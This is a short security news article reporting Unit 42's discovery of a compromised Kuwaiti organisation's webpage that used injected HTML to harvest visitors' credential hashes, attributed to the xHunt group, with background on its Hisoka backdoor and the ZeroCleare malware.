Security experts from Unit 42, a threat intelligence unit of Palo Alto Networks, recently discovered a Kuwait organization’s webpage used in a security exploit. The researchers stated that the webpage contained a hidden image which was observed between June and December 2019.
According to the researchers, attackers compromised and injected a malicious HTML code into the website to obtain credentials like account names and password hashes from the website’s visitors. It’s believed that the attackers aimed to crack these hashes to get the visitors’ passwords or use the hashes to carry out relay attacks. Access to user account credentials allows the attackers to launch remote access trojan (RAT) attacks.
The researchers stated, “If successful in harvesting account credentials, the compromised data has a plethora of uses for the attackers and can allow them to breach an organization to steal sensitive information. Furthermore, because they’d be using trusted credentials, it can allow attackers to go undetected for long periods of time, enabling them to infiltrate other parts of an organization and even implement backdoors, like RATs, to get back into a system even after being removed. This can result in significant damage to an organization over a prolonged period of time.”
Unit 42 believes that the threat actor group “xHunt” is likely to be behind the malicious activity. Previously, xHunt hacking group targeted transportation and shipping organizations based in Kuwait between May and June 2019, in which the hackers installed a backdoor tool named “Hisoka”. Several custom tools were later downloaded to the system in order to carry out post-exploitation activities.
xHunt’s Hacking History
Earlier, in its research report, IBM revealed that “ZeroCleare” malware was a creation of two hacking groups—xHunt and APT34. It said that the malware was developed by Iranian state-sponsored hackers and used in cyberattacks against energy companies in the Middle East. It also added that the hackers launched brute-force attacks to gain access to weakly secured network systems. Once attackers infect the target device, they spread the malware across the company’s network as the last step of infection.